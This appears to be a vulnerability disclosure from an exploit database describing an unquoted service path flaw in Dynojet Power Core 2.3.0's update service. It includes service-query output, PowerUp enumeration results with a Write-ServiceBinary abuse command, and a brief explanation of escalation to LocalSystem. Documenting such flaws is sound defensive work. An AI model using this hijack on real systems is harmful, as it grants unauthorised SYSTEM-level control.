Dynojet Power Core 2.3.0 - Unquoted Service Path

2021-11-02
ID: 104909
CVE: None
Download vulnerable application: None
# Exploit Title: 
# Exploit Author: Pedro Sousa Rodrigues (https://www.0x90.zone/ / @Pedro_SEC_R)
# Version: 2.3.0 (Build 303)
# Date: 30.10.2021
# Vendor Homepage: https://www.dynojet.com/
# Software Link: https://docs.dynojet.com/Document/18762
# Tested on: Windows 10 Version 21H1 (OS Build 19043.1320)

SERVICE_NAME: DJ.UpdateService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Dynojet Power Core\DJ.UpdateService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : DJ.UpdateService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
PS C:\Users\Developer> Get-UnquotedService


ServiceName    : DJ.UpdateService
Path           : C:\Program Files\Dynojet Power Core\DJ.UpdateService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users;
                 Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'DJ.UpdateService' -Path <HijackPath>
CanRestart     : True
Name           : DJ.UpdateService

ServiceName    : DJ.UpdateService
Path           : C:\Program Files\Dynojet Power Core\DJ.UpdateService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users; Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'DJ.UpdateService' -Path <HijackPath>
CanRestart     : True
Name           : DJ.UpdateService

#Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path (depending on the installation path). The service might be executed manually by any Authenticated user. If successful, the local user's code would execute with the elevated privileges of Local System.
1-4-2 (www01)